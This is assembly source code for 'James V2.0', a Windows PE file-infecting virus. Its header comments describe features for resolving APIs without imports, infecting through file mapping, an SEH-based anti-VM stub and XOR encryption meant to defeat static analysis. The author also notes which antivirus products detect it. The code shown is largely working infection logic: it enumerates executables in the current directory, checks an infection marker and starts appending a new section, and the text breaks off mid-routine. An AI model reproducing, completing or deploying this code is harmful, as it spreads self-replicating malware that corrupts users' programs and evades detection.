win32.james v2.0病毒源码.asm

James病毒 Complier: MASM32 Debuged: Under windows2000/XP 使用Mapping来感染

;====================NOTICE!This is a virus source!please take care of it==================================================
;virus name: James V2.0(last builded in 2003-8-25)
;function:   infect the currentdirectory's PE file.But it's not completed,sometimes it works,sometimes it's a
;     trouble-maker.So,please carefully!
;Complier:   MASM32
;Debuged:    Under windows2000/XP
;Author:     james joo (zhu zhe)
;e-mail:     warmwaters@21cn.com
;              (c)Copyright reserved 
;            NEWTECH Studio
;          http://kobesworld.yeah.net
;for NorthWest Polytechnical University,my parents,my girlfriend...
;        Hope you enjoy it!Just for fun!
;Although the technique of this virus is so so,it's my favarite,it's created by myself.So,Don't change anything,if you want
;copy it!
;Norton AV will scan this virus,it would tell the virus is:Bloodhound.w32.1
;KV2003 cant scan this virus!
;Other AV???dont know!!!!!!!!!!!!!
;ml /c /Zi james.asm
;link /subsystem:windows /machine:IX86 /section:.text,RWE james.obj
;2.0新增功能：
;1、将取API的代码放到病毒本体中，这样感染后的文件可以在别的平台下继续感染，以前感染后的文件要想继续正常感染必须是在同一OS下。
;   暴力搜索KERNEL32.DLL的代码是引用LUOCONG大侠的。
;2、使用Mapping来感染，以前是在文件上操作。
;3、使用了SEH。现在还没什么用，以后会利用SEH来ANTI-VM的。
;4、使用了简单的xor来加密代码，防止静态分析。
;
;==========================================================================================================================
.386
.model flat,stdcall
option casemap:none
include e:\masm32\include\windows.inc;my masm32's path,you can change it to yours
include e:\masm32\include\kernel32.inc
include e:\masm32\include\comctl32.inc
include e:\masm32\include\user32.inc
include e:\masm32\include\gdi32.inc
include e:\masm32\include\comdlg32.inc
includelib e:\masm32\lib\gdi32.lib
includelib e:\masm32\lib\kernel32.lib
includelib e:\masm32\lib\comctl32.lib
includelib e:\masm32\lib\user32.lib
includelib e:\masm32\lib\comdlg32.lib


GetKernelBase   proto   :DWORD
GetApiAddress   proto   :DWORD, :DWORD

.data
mcaption db "Hello!This Programe just show the usage of the API:MessageBox",0
mtitle db "Title",0

.code
host_start:
          invoke MessageBoxA,NULL,offset mcaption,offset mtitle,MB_OK

    


;--------------------------------------
;ok,Action!
;----------------------------------------


vstart:

;push ebp
;push esp
xor ebx,ebx
mov ebx,[esp]
call nstart
nstart: 
pop ebp
sub ebp,offset nstart;classical way to get the address of the virus-self!
;---------------------------------------
;save the Entrypoint!!!!!!!!!!!!!!!!!!!
;---------------------------------------
cmp now[ebp],0
jnz gonext

mov Old_ImageBase[ebp],0h
lea eax,vend[ebp]
mov Old_AddressOfEntryPoint[ebp],eax


gonext:
moveax,Old_ImageBase[ebp]
push eax
moveax,Old_AddressOfEntryPoint[ebp]
push eax
;;;;;;;;;;;;;;;;;anti-vm;;;;;;;;;;;;;;;;;;;;;;;;;;;;;


ASSUME FS:NOTHING
lea eax,SEH1[ebp]
push eax
push    fs:[0]       
      mov     fs:[0],esp                       
mov esi,0
mov eax,[esi];make a error for SEH


ExecuteHere:
pop     fs:[0]              ;清除seh链表
      add     esp,4


;;;;;;;;;;;;;;;anti-vmEND;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; 
cmp now[ebp],0
jz  EncryptStart

lea  edi , EncryptStart[ebp]
mov  ecx , EncryptEnd - EncryptStart
DecryptLoop:
    xor    byte ptr [edi] , 27h  
    inc    edi
    loop   DecryptLoop    
EncryptStart:         

;;;;;;;;;;;;;;;;;;;ok,GetApI
;获得 Kernel32.dll 的基地址：
  push ebx
  call GetKernelBase
  mov Kernel32Base[ebp], eax

  ;获得 Kernel32.dll 中的所需的 Api 的线性地址
  lea eax,szExitProcess[ebp]
  push eax
  push Kernel32Base[ebp]
  call GetApiAddress
  mov ExitProcess_addr[ebp], eax


  lea eax,szLoadLibraryA[ebp]
  push eax
  push Kernel32Base[ebp]
  call GetApiAddress
  mov LoadLibraryA_addr[ebp], eax


  lea eax,szGetProcAddress[ebp]
  push eax
  push Kernel32Base[ebp]
  call GetApiAddress
  mov GetProcAddress_addr[ebp], eax

  ;载入 User32.dll ：
  lea eax,szDllName[ebp]
  push eax
  call [ebp + LoadLibraryA_addr]

  ;获得 User32.dll 中的 MessageBoxA 的线性地址：
  lea ebx,szMessageBoxA[ebp]
  push ebx
  push eax
  call [ebp + GetProcAddress_addr]
  mov MessageBox_addr[ebp], eax;Messagebox
  ;载入 Kernel32.dll ：
  lea eax,szDllName2[ebp]
  push eax
  call [ebp + LoadLibraryA_addr]
  
  ;获得 KERNEL32.dll 中的API
  lea ebx,szCreateFile[ebp]
  push ebx
  push eax
  call [ebp + GetProcAddress_addr]
  mov CreateFile_addr[ebp], eax;Createfile


lea eax,szDllName2[ebp]
  push eax
  call [ebp + LoadLibraryA_addr]
lea ebx,szReadFile[ebp]
  push ebx
  push eax
  call [ebp + GetProcAddress_addr]
  mov ReadFile_addr[ebp], eax;readfile

lea eax,szDllName2[ebp]
 push eax
  call [ebp + LoadLibraryA_addr]
lea ebx,szWriteFile[ebp]
  push ebx
  push eax
  call [ebp + GetProcAddress_addr]
  mov WriteFile_addr[ebp], eax;writefile

lea eax,szDllName2[ebp]
  push eax
  call [ebp + LoadLibraryA_addr]
lea ebx,szGetCurrentDirectory[ebp]
  push ebx
  push eax
  call [ebp + GetProcAddress_addr]
  mov GetCurrentDirectory_addr[ebp], eax;GetCurrentDirectory

lea eax,szDllName2[ebp]
  push eax
  call [ebp + LoadLibraryA_addr]
lea ebx,szGetSystemTime[ebp]
  push ebx
  push eax
  call [ebp + GetProcAddress_addr]
  mov GetSystemTime_addr[ebp], eax;GetSystemTime

lea eax,szDllName2[ebp]
  push eax
  call [ebp + LoadLibraryA_addr]
lea ebx,szSetFilePointer[ebp]
  push ebx
  push eax
  call [ebp + GetProcAddress_addr]
  mov SetFilePointer_addr[ebp], eax;SetFilePointer

lea eax,szDllName2[ebp]
  push eax
  call [ebp + LoadLibraryA_addr]
lea ebx,szFindFirstFile[ebp]
  push ebx
  push eax
  call [ebp + GetProcAddress_addr]
  mov FindFirstFile_addr[ebp], eax;FindFirstFile

lea eax,szDllName2[ebp]
  push eax
  call [ebp + LoadLibraryA_addr]
lea ebx,szFindNextFile[ebp]
  push ebx
  push eax
  call [ebp + GetProcAddress_addr]
  mov FindNextFile_addr[ebp], eax;FindNextFile

lea eax,szDllName2[ebp]
  push eax
  call [ebp + LoadLibraryA_addr]
lea ebx,szFindClose[ebp]
  push ebx
  push eax
  call [ebp + GetProcAddress_addr]
  mov FindClose_addr[ebp], eax;FindClose

lea eax,szDllName2[ebp]
  push eax
  call [ebp + LoadLibraryA_addr]
lea ebx,szCloseHandle[ebp]
  push ebx
  push eax
  call [ebp + GetProcAddress_addr]
  mov CloseHandle_addr[ebp], eax;CloseHandle

lea eax,szDllName2[ebp]
  push eax
  call [ebp + LoadLibraryA_addr]
lea ebx,szVirtualAlloc[ebp]
  push ebx
  push eax
  call [ebp + GetProcAddress_addr]
  mov VirtualAlloc_addr[ebp], eax;VirtualAlloc

lea eax,szDllName2[ebp]
  push eax
  call [ebp + LoadLibraryA_addr]
lea ebx,szCreateFileMapping[ebp]
  push ebx
  push eax
  call [ebp + GetProcAddress_addr]
  mov CreateFileMapping_addr[ebp], eax;CreateFileMapping

lea eax,szDllName2[ebp]
  push eax
  call [ebp + LoadLibraryA_addr]
lea ebx,szMapViewOfFile[ebp]
  push ebx
  push eax
  call [ebp + GetProcAddress_addr]
  mov MapViewOfFile_addr[ebp], eax;MapViewOfFile


lea eax,szDllName2[ebp]
  push eax
  call [ebp + LoadLibraryA_addr]
lea ebx,szUnmapViewOfFile[ebp]
  push ebx
  push eax
  call [ebp + GetProcAddress_addr]
  mov UnmapViewOfFile_addr[ebp], eax;UnmapViewOfFile

lea eax,szDllName2[ebp]
  push eax
  call [ebp + LoadLibraryA_addr]
lea ebx,szGetFileSize[ebp]
  push ebx
  push eax
  call [ebp + GetProcAddress_addr]
  mov GetFileSize_addr[ebp], eax;GetFileSize


lea eax,szDllName2[ebp]
  push eax
  call [ebp + LoadLibraryA_addr]
lea ebx,szVirtualFree[ebp]
  push ebx
  push eax
  call [ebp + GetProcAddress_addr]
  mov VirtualFree_addr[ebp], eax;VirtualFree

;;;;;;;;;;;;;;;;;;;GetApiEnd
;-----------------------------
;get currentdirectory
;-------------------------------
lea eax,NowPath[ebp]
push eax
mov eax,256
push eax
call GetCurrentDirectory_addr[ebp];the address is getten later!

;------------------------------------------------
;Find first PE file in this directory to infect
;------------------------------------------------
GFindFt:
lea eax,FindData[ebp]
push eax
lea eax,FileFilter[ebp]
push eax
call FindFirstFile_addr[ebp]
cmp eax,0
jz FindEnds
mov hFind[ebp],eax
;-----------------------------------------------------
;Let's open this PEfile to analysis
;-----------------------------------------------------
GoOnFind:

infect:
;;;;;;;;;;;;;create
push 0
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push 0
push FILE_SHARE_READ or FILE_SHARE_WRITE
push GENERIC_READ or GENERIC_WRITE
lea eax,FindData[ebp].cFileName
push eax
call CreateFile_addr[ebp]
cmp eax,INVALID_HANDLE_value
jz createfail
mov hFile[ebp],eax

push 0;;;;;;;;;;;;;;;保存文件大小
push eax
call GetFileSize_addr[ebp]
cmp eax,0
jz createfail
mov filesize[ebp],eax

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;createmapping
push 0
push 0
push 0
push PAGE_READWRITE
push 0
mov eax,hFile[ebp]
push eax
call CreateFileMapping_addr[ebp]
cmp eax,0
jz createMapfail
mov hMap[ebp],eax

;;;;;;;;;;;;;;Mapviewoffile
push 0
push 0
push 0
push FILE_MAP_ALL_ACCESS
mov eax,hMap[ebp]
push eax
call MapViewOfFile_addr[ebp]
cmp eax,0
jz Mappingfail
mov pMem[ebp],eax
;;;;;;;;;;;;;;;ok,go on

mov edi, eax
assume edi:ptr IMAGE_DOS_HEADER 
cmp [edi].e_magic,IMAGE_DOS_SIGNATURE 
jnz Notinfect

add edi, [edi].e_lfanew
assume edi:ptr IMAGE_NT_HEADERS
cmp [edi].Signature,IMAGE_NT_SIGNATURE
jnz Notinfect
movzx eax,[edi].FileHeader.NumberOfSections
dec eax
mov ecx,sizeof IMAGE_SECTION_HEADER;28h
mul ecx
push edi
pop  esi
assume esi:ptr IMAGE_NT_HEADERS
add edi,sizeof IMAGE_NT_HEADERS
add edi,eax
assume edi:ptr IMAGE_SECTION_HEADER
cmp [edi].NumberOfRelocations,02704h;;;;;;;;;;;感染标志
jz Notinfect
add edi,sizeof IMAGE_SECTION_HEADER;;;;;;;;;;;;;继续判断是否还有添加新节的空间,新节开始的内存地质,edi为新节开始

movzx ebx,[esi].FileHeader.NumberOfSections
inc ebx
mov eax,sizeof IMAGE_SECTION_HEADER
mul ebx

mov ebx,pMem[ebp]
assume ebx:ptr IMAGE_DOS_HEADER
mov ecx,[ebx].e_lfanew
add ecx,sizeof IMAGE_NT_HEADERS
add ecx,eax